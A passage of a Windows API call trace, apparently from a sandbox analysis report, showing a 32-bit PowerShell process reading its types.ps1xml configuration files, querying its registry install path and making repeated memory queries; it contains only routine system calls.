"c:\\windows\\syswow64\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x350 [0053.813] GetLastError () returned 0x0 [0053.814] GetFileType (hFile=0x350) returned 0x1 [0053.814] SetErrorMode (uMode=0x1) returned 0x1 [0053.814] GetFileType (hFile=0x350) returned 0x1 [0053.816] ReadFile (in: hFile=0x350, lpBuffer=0x2aa0678, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2cea54, lpOverlapped=0x0 | out: lpBuffer=0x2aa0678*, lpNumberOfBytesRead=0x2cea54*=0x1000, lpOverlapped=0x0) returned 1 [0053.818] GetLastError () returned 0x0 [0053.819] ReadFile (in: hFile=0x350, lpBuffer=0x2aa0678, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2cea54, lpOverlapped=0x0 | out: lpBuffer=0x2aa0678*, lpNumberOfBytesRead=0x2cea54*=0x1000, lpOverlapped=0x0) returned 1 [0053.819] GetLastError () returned 0x0 [0053.820] ReadFile (in: hFile=0x350, lpBuffer=0x2aa0678, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2cea54, lpOverlapped=0x0 | out: lpBuffer=0x2aa0678*, lpNumberOfBytesRead=0x2cea54*=0x1000, lpOverlapped=0x0) returned 1 [0053.820] GetLastError () returned 0x0 [0053.820] ReadFile (in: hFile=0x350, lpBuffer=0x2aa0678, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2cea54, lpOverlapped=0x0 | out: lpBuffer=0x2aa0678*, lpNumberOfBytesRead=0x2cea54*=0xcf3, lpOverlapped=0x0) returned 1 [0053.820] GetLastError () returned 0x0 [0053.820] ReadFile (in: hFile=0x350, lpBuffer=0x2a9fb0b, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x2cea54, lpOverlapped=0x0 | out: lpBuffer=0x2a9fb0b*, lpNumberOfBytesRead=0x2cea54*=0x0, lpOverlapped=0x0) returned 1 [0053.820] GetLastError () returned 0x0 [0053.820] ReadFile (in: hFile=0x350, lpBuffer=0x2aa0678, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2cea54, lpOverlapped=0x0 | out: lpBuffer=0x2aa0678*, lpNumberOfBytesRead=0x2cea54*=0x0, lpOverlapped=0x0) returned 1 [0053.820] GetLastError () returned 0x0 [0053.821] CloseHandle (hObject=0x350) returned 1 [0053.821] GetLastError () returned 0x0 [0053.822] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x2ce5b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0053.822] GetLastError () returned 0x0 [0053.822] SetErrorMode (uMode=0x1) returned 0x1 [0053.822] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2ab19ec | out: lpFileInformation=0x2ab19ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0058e2, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0058e2, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd7bbaefc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1 [0053.822] GetLastError () returned 0x0 [0053.822] SetErrorMode (uMode=0x1) returned 0x1 [0053.823] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x2ce580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0053.823] GetLastError () returned 0x0 [0053.824] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce9d8 | out: phkResult=0x2ce9d8*=0x350) returned 0x0 [0053.824] RegQueryValueExW (in: hKey=0x350, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x2cea20, lpData=0x0, lpcbData=0x2cea1c*=0x0 | out: lpType=0x2cea20*=0x1, lpData=0x0, lpcbData=0x2cea1c*=0x56) returned 0x0 [0053.824] RegQueryValueExW (in: hKey=0x350, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x2cea20, lpData=0x3b8428, lpcbData=0x2cea1c*=0x56 | out: lpType=0x2cea20*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x2cea1c*=0x56) returned 0x0 [0053.824] RegCloseKey (hKey=0x350) returned 0x0 [0053.824] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x2ce580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0053.824] GetLastError () returned 0x0 [0053.825] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x2ce514, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0053.825] GetLastError () returned 0x0 [0053.869] GetSystemInfo (in: lpSystemInfo=0x2ce158 | out: lpSystemInfo=0x2ce158*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0053.869] VirtualQuery (in: lpAddress=0x2cd914, lpBuffer=0x2ce914, dwLength=0x1c | out: lpBuffer=0x2ce914*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0053.891] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x2ce4ec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0053.891] GetLastError () returned 0x0 [0053.891] SetErrorMode (uMode=0x1) returned 0x1 [0053.891] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x350 [0053.891] GetLastError () returned 0x0 [0053.891] GetFileType (hFile=0x350) returned 0x1 [0053.891] SetErrorMode (uMode=0x1) returned 0x1 [0053.892] GetFileType (hFile=0x350) returned 0x1 [0053.892] ReadFile (in: hFile=0x350, lpBuffer=0x2ae5e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2cea54, lpOverlapped=0x0 | out: lpBuffer=0x2ae5e08*, lpNumberOfBytesRead=0x2cea54*=0x1000, lpOverlapped=0x0) returned 1 [0053.893] GetLastError () returned 0x0 [0053.894] ReadFile (in: hFile=0x350, lpBuffer=0x2ae5e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2cea54, lpOverlapped=0x0 | out: lpBuffer=0x2ae5e08*, lpNumberOfBytesRead=0x2cea54*=0x1000, lpOverlapped=0x0) returned 1 [0053.895] GetLastError () returned 0x0 [0053.895] ReadFile (in: hFile=0x350, lpBuffer=0x2ae5e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2cea54, lpOverlapped=0x0 | out: lpBuffer=0x2ae5e08*, lpNumberOfBytesRead=0x2cea54*=0x1000, lpOverlapped=0x0) returned 1 [0053.895] GetLastError () returned 0x0 [0053.896] ReadFile (in: hFile=0x350, lpBuffer=0x2ae5e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2cea54, lpOverlapped=0x0 | out: lpBuffer=0x2ae5e08*, lpNumberOfBytesRead=0x2cea54*=0x1000, lpOverlapped=0x0) returned 1 [0053.896] GetLastError () returned 0x0 [0053.896] ReadFile (in: hFile=0x350, lpBuffer=0x2ae5e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2cea54, lpOverlapped=0x0 | out: lpBuffer=0x2ae5e08*, lpNumberOfBytesRead=0x2cea54*=0x1000, lpOverlapped=0x0) returned 1 [0053.896] GetLastError () returned 0x0 [0053.897] ReadFile (in: hFile=0x350, lpBuffer=0x2ae5e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2cea54, lpOverlapped=0x0 | out: lpBuffer=0x2ae5e08*, lpNumberOfBytesRead=0x2cea54*=0x1000, lpOverlapped=0x0) returned 1 [0053.897] GetLastError () returned 0x0 [0053.897] ReadFile (in: hFile=0x350, lpBuffer=0x2ae5e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2cea54, lpOverlapped=0x0 | out: lpBuffer=0x2ae5e08*, lpNumberOfBytesRead=0x2cea54*=0x1000, lpOverlapped=0x0) returned 1 [0053.897] GetLastError () returned 0x0 [0053.897] ReadFile (in: hFile=0x350, lpBuffer=0x2ae5e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2cea54, lpOverlapped=0x0 | out: lpBuffer=0x2ae5e08*, lpNumberOfBytesRead=0x2cea54*=0x1000, lpOverlapped=0x0) returned 1 [0053.897] GetLastError () returned 0x0 [0053.897] ReadFile (in: hFile=0x350, lpBuffer=0x2ae5e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2cea54, lpOverlapped=0x0 | out: lpBuffer=0x2ae5e08*, lpNumberOfBytesRead=0x2cea54*=0x1000, lpOverlapped=0x0) returned 1 [0053.897] GetLastError () returned 0x0 [0053.898] ReadFile (in: hFile=0x350, lpBuffer=0x2ae5e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2cea54, lpOverlapped=0x0 | out: lpBuffer=0x2ae5e08*, lpNumberOfBytesRead=0x2cea54*=0x1000, lpOverlapped=0x0) returned 1 [0053.898] GetLastError () returned 0x0 [0053.898] ReadFile (in: hFile=0x350, lpBuffer=0x2ae5e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2cea54, lpOverlapped=0x0 | out: lpBuffer=0x2ae5e08*, lpNumberOfBytesRead=0x2cea54*=0x1000, lpOverlapped=0x0) returned 1 [0053.898] GetLastError () returned 0x0 [0053.899] ReadFile (in: hFile=0x350, lpBuffer=0x2ae5e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2cea54, lpOverlapped=0x0 | out: lpBuffer=0x2ae5e08*, lpNumberOfBytesRead=0x2cea54*=0x1000, lpOverlapped=0x0) returned 1 [0053.899] GetLastError () returned 0x0 [0053.899] ReadFile (in: hFile=0x350, lpBuffer=0x2ae5e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2cea54, lpOverlapped=0x0 | out: lpBuffer=0x2ae5e08*, lpNumberOfBytesRead=0x2cea54*=0x1000, lpOverlapped=0x0) returned 1 [0053.899] GetLastError () returned 0x0 [0053.899] ReadFile (in: hFile=0x350, lpBuffer=0x2ae5e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2cea54, lpOverlapped=0x0 | out: lpBuffer=0x2ae5e08*, lpNumberOfBytesRead=0x2cea54*=0x1000, lpOverlapped=0x0) returned 1 [0053.899] GetLastError () returned 0x0 [0053.899] ReadFile (in: hFile=0x350, lpBuffer=0x2ae5e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2cea54, lpOverlapped=0x0 | out: lpBuffer=0x2ae5e08*, lpNumberOfBytesRead=0x2cea54*=0x1000, lpOverlapped=0x0) returned 1 [0053.899] GetLastError () returned 0x0 [0053.899] ReadFile (in: hFile=0x350, lpBuffer=0x2ae5e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2cea54, lpOverlapped=0x0 | out: lpBuffer=0x2ae5e08*, lpNumberOfBytesRead=0x2cea54*=0x1000, lpOverlapped=0x0) returned 1 [0053.899] GetLastError () returned 0x0 [0053.900] ReadFile (in: hFile=0x350, lpBuffer=0x2ae5e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2cea54, lpOverlapped=0x0 | out: lpBuffer=0x2ae5e08*, lpNumberOfBytesRead=0x2cea54*=0x1000, lpOverlapped=0x0) returned 1 [0053.900] GetLastError () returned 0x0 [0053.902] ReadFile (in: hFile=0x350, lpBuffer=0x2ae5e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2cea54, lpOverlapped=0x0 | out: lpBuffer=0x2ae5e08*, lpNumberOfBytesRead=0x2cea54*=0x1000, lpOverlapped=0x0) returned 1 [0053.902] GetLastError () returned 0x0 [0053.902] ReadFile (in: hFile=0x350, lpBuffer=0x2ae5e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2cea54, lpOverlapped=0x0 | out: lpBuffer=0x2ae5e08*, lpNumberOfBytesRead=0x2cea54*=0x1000, lpOverlapped=0x0) returned 1 [0053.902] GetLastError () returned 0x0 [0053.902] ReadFile (in: hFile=0x350, lpBuffer=0x2ae5e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2cea54, lpOverlapped=0x0 | out: lpBuffer=0x2ae5e08*, lpNumberOfBytesRead=0x2cea54*=0x1000, lpOverlapped=0x0) returned 1 [0053.902] GetLastError () returned 0x0 [0053.903] ReadFile (in: hFile=0x350, lpBuffer=0x2ae5e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2cea54, lpOverlapped=0x0 | out: lpBuffer=0x2ae5e08*, lpNumberOfBytesRead=0x2cea54*=0x1000, lpOverlapped=0x0) returned 1 [0053.903] GetLastError () returned 0x0 [0053.903] ReadFile (in: hFile=0x350, lpBuffer=0x2ae5e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2cea54, lpOverlapped=0x0 | out: lpBuffer=0x2ae5e08*, lpNumberOfBytesRead=0x2cea54*=0x1000, lpOverlapped=0x0) returned 1 [0053.903] GetLastError () returned 0x0 [0053.903] ReadFile (in: hFile=0x350, lpBuffer=0x2ae5e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2cea54, lpOverlapped=0x0 | out: lpBuffer=0x2ae5e08*, lpNumberOfBytesRead=0x2cea54*=0x1000, lpOverlapped=0x0) returned 1 [0053.903] GetLastError () returned 0x0 [0053.903] ReadFile (in: hFile=0x350, lpBuffer=0x2ae5e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2cea54, lpOverlapped=0x0 | out: lpBuffer=0x2ae5e08*, lpNumberOfBytesRead=0x2cea54*=0x1000, lpOverlapped=0x0) returned 1 [0053.903] GetLastError () returned 0x0 [0053.903] ReadFile (in: hFile=0x350, lpBuffer=0x2ae5e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2cea54, lpOverlapped=0x0 | out: lpBuffer=0x2ae5e08*, lpNumberOfBytesRead=0x2cea54*=0x1000, lpOverlapped=0x0) returned 1 [0053.903] GetLastError () returned 0x0 [0053.904] ReadFile (in: hFile=0x350, lpBuffer=0x2ae5e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2cea54, lpOverlapped=0x0 | out: lpBuffer=0x2ae5e08*, lpNumberOfBytesRead=0x2cea54*=0x1000, lpOverlapped=0x0) returned 1 [0053.904] GetLastError () returned 0x0 [0053.904] ReadFile (in: hFile=0x350, lpBuffer=0x2ae5e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2cea54, lpOverlapped=0x0 | out: lpBuffer=0x2ae5e08*, lpNumberOfBytesRead=0x2cea54*=0x1000, lpOverlapped=0x0) returned 1 [0053.904] GetLastError () returned 0x0 [0053.904] ReadFile (in: hFile=0x350, lpBuffer=0x2ae5e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2cea54, lpOverlapped=0x0 | out: lpBuffer=0x2ae5e08*, lpNumberOfBytesRead=0x2cea54*=0x1000, lpOverlapped=0x0) returned 1 [0053.904] GetLastError () returned 0x0 [0053.904] ReadFile (in: hFile=0x350, lpBuffer=0x2ae5e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2cea54, lpOverlapped=0x0 | out: lpBuffer=0x2ae5e08*, lpNumberOfBytesRead=0x2cea54*=0x1000, lpOverlapped=0x0) returned 1 [0053.904] GetLastError () returned 0x0 [0053.904] ReadFile (in: hFile=0x350, lpBuffer=0x2ae5e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2cea54, lpOverlapped=0x0 | out: lpBuffer=0x2ae5e08*, lpNumberOfBytesRead=0x2cea54*=0x1000, lpOverlapped=0x0) returned 1 [0053.905] GetLastError () returned 0x0 [0053.905] ReadFile (in: hFile=0x350, lpBuffer=0x2ae5e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2cea54, lpOverlapped=0x0 | out: lpBuffer=0x2ae5e08*, lpNumberOfBytesRead=0x2cea54*=0x1000, lpOverlapped=0x0) returned 1 [0053.905] GetLastError () returned 0x0 [0053.905] ReadFile (in: hFile=0x350, lpBuffer=0x2ae5e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2cea54, lpOverlapped=0x0 | out: lpBuffer=0x2ae5e08*, lpNumberOfBytesRead=0x2cea54*=0x1000, lpOverlapped=0x0) returned 1 [0053.905] GetLastError () returned 0x0 [0053.905] ReadFile (in: hFile=0x350, lpBuffer=0x2ae5e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2cea54, lpOverlapped=0x0 | out: lpBuffer=0x2ae5e08*, lpNumberOfBytesRead=0x2cea54*=0x1000, lpOverlapped=0x0) returned 1 [0053.905] GetLastError () returned 0x0 [0053.909] ReadFile (in: hFile=0x350, lpBuffer=0x2ae5e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2cea54, lpOverlapped=0x0 | out: lpBuffer=0x2ae5e08*, lpNumberOfBytesRead=0x2cea54*=0x1000, lpOverlapped=0x0) returned 1 [0053.909] GetLastError () returned 0x0 [0053.909] ReadFile (in: hFile=0x350, lpBuffer=0x2ae5e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2cea54, lpOverlapped=0x0 | out: lpBuffer=0x2ae5e08*, lpNumberOfBytesRead=0x2cea54*=0x1000, lpOverlapped=0x0) returned 1 [0053.909] GetLastError () returned 0x0 [0053.910] ReadFile (in: hFile=0x350, lpBuffer=0x2ae5e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2cea54, lpOverlapped=0x0 | out: lpBuffer=0x2ae5e08*, lpNumberOfBytesRead=0x2cea54*=0x1000, lpOverlapped=0x0) returned 1 [0053.910] GetLastError () returned 0x0 [0053.910] ReadFile (in: hFile=0x350, lpBuffer=0x2ae5e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2cea54, lpOverlapped=0x0 | out: lpBuffer=0x2ae5e08*, lpNumberOfBytesRead=0x2cea54*=0x1000, lpOverlapped=0x0) returned 1 [0053.910] GetLastError () returned 0x0 [0053.910] ReadFile (in: hFile=0x350, lpBuffer=0x2ae5e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2cea54, lpOverlapped=0x0 | out: lpBuffer=0x2ae5e08*, lpNumberOfBytesRead=0x2cea54*=0x1000, lpOverlapped=0x0) returned 1 [0053.910] GetLastError () returned 0x0 [0053.910] ReadFile (in: hFile=0x350, lpBuffer=0x2ae5e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2cea54, lpOverlapped=0x0 | out: lpBuffer=0x2ae5e08*, lpNumberOfBytesRead=0x2cea54*=0x1000, lpOverlapped=0x0) returned 1 [0053.910] GetLastError () returned 0x0 [0053.910] ReadFile (in: hFile=0x350, lpBuffer=0x2ae5e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2cea54, lpOverlapped=0x0 | out: lpBuffer=0x2ae5e08*, lpNumberOfBytesRead=0x2cea54*=0x1000, lpOverlapped=0x0) returned 1 [0053.910] GetLastError () returned 0x0 [0053.911] ReadFile (in: hFile=0x350, lpBuffer=0x2ae5e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2cea54, lpOverlapped=0x0 | out: lpBuffer=0x2ae5e08*, lpNumberOfBytesRead=0x2cea54*=0x1000, lpOverlapped=0x0) returned 1 [0053.911] GetLastError () returned 0x0 [0053.911] ReadFile (in: hFile=0x350, lpBuffer=0x2ae5e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2cea54, lpOverlapped=0x0 | out: lpBuffer=0x2ae5e08*, lpNumberOfBytesRead=0x2cea54*=0x1b4, lpOverlapped=0x0) returned 1 [0053.911] GetLastError () returned 0x0 [0053.911] ReadFile (in: hFile=0x350, lpBuffer=0x2ae5e08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2cea54, lpOverlapped=0x0 | out: lpBuffer=0x2ae5e08*, lpNumberOfBytesRead=0x2cea54*=0x0, lpOverlapped=0x0) returned 1 [0053.911] GetLastError () returned 0x0 [0053.911] CloseHandle (hObject=0x350) returned 1 [0053.911] GetLastError () returned 0x0 [0053.911] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x2ce5b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0053.911] GetLastError () returned 0x0 [0053.911] SetErrorMode (uMode=0x1) returned 0x1 [0053.911] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2b06698 | out: lpFileInformation=0x2b06698*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7c2d31c, ftCreationTime.dwHighDateTime=0x1c9ea11, ftLastAccessTime.dwLowDateTime=0xd7c2d31c, ftLastAccessTime.dwHighDateTime=0x1c9ea11, ftLastWriteTime.dwLowDateTime=0xd7c5347c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1 [0053.911] GetLastError () returned 0x0 [0053.911] SetErrorMode (uMode=0x1) returned 0x1 [0053.911] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x2ce580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0053.911] GetLastError () returned 0x0 [0053.912] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce9d8 | out: phkResult=0x2ce9d8*=0x350) returned 0x0 [0053.912] RegQueryValueExW (in: hKey=0x350, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x2cea20, lpData=0x0, lpcbData=0x2cea1c*=0x0 | out: lpType=0x2cea20*=0x1, lpData=0x0, lpcbData=0x2cea1c*=0x56) returned 0x0 [0053.912] RegQueryValueExW (in: hKey=0x350, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x2cea20, lpData=0x3b8428, lpcbData=0x2cea1c*=0x56 | out: lpType=0x2cea20*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x2cea1c*=0x56) returned 0x0 [0053.912] RegCloseKey (hKey=0x350) returned 0x0 [0053.912] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x2ce580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0053.912] GetLastError () returned 0x0 [0053.912] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x2ce514, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0053.912] GetLastError () returned 0x0 [0054.043] VirtualQuery (in: lpAddress=0x2cd914, lpBuffer=0x2ce914, dwLength=0x1c | out: lpBuffer=0x2ce914*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.049] VirtualQuery (in: lpAddress=0x2cd914, lpBuffer=0x2ce914, dwLength=0x1c | out: lpBuffer=0x2ce914*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.050] VirtualQuery (in: lpAddress=0x2cd914, lpBuffer=0x2ce914, dwLength=0x1c | out: lpBuffer=0x2ce914*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.051] VirtualQuery (in: lpAddress=0x2cd914, lpBuffer=0x2ce914, dwLength=0x1c | out: lpBuffer=0x2ce914*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.051] VirtualQuery (in: lpAddress=0x2cd914, lpBuffer=0x2ce914, dwLength=0x1c | out: lpBuffer=0x2ce914*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.051] VirtualQuery (in: lpAddress=0x2cd914, lpBuffer=0x2ce914, dwLength=0x1c | out: lpBuffer=0x2ce914*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.051] VirtualQuery (in: lpAddress=0x2cd914, lpBuffer=0x2ce914, dwLength=0x1c | out: lpBuffer=0x2ce914*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.054] VirtualQuery (in: lpAddress=0x2cd914, lpBuffer=0x2ce914, dwLength=0x1c | out: lpBuffer=0x2ce914*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.066] VirtualQuery (in: lpAddress=0x2cd914, lpBuffer=0x2ce914, dwLength=0x1c | out: lpBuffer=0x2ce914*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.066] VirtualQuery (in: lpAddress=0x2cd914, lpBuffer=0x2ce914, dwLength=0x1c | out: lpBuffer=0x2ce914*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.066] VirtualQuery (in: lpAddress=0x2cd914, lpBuffer=0x2ce914, dwLength=0x1c | out: lpBuffer=0x2ce914*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.066] VirtualQuery (in: lpAddress=0x2cd914, lpBuffer=0x2ce914, dwLength=0x1c | out: lpBuffer=0x2ce914*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.067] VirtualQuery (in: lpAddress=0x2cd914, lpBuffer=0x2ce914, dwLength=0x1c | out: lpBuffer=0x2ce914*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.067] VirtualQuery (in: lpAddress=0x2cd914, lpBuffer=0x2ce914, dwLength=0x1c | out: 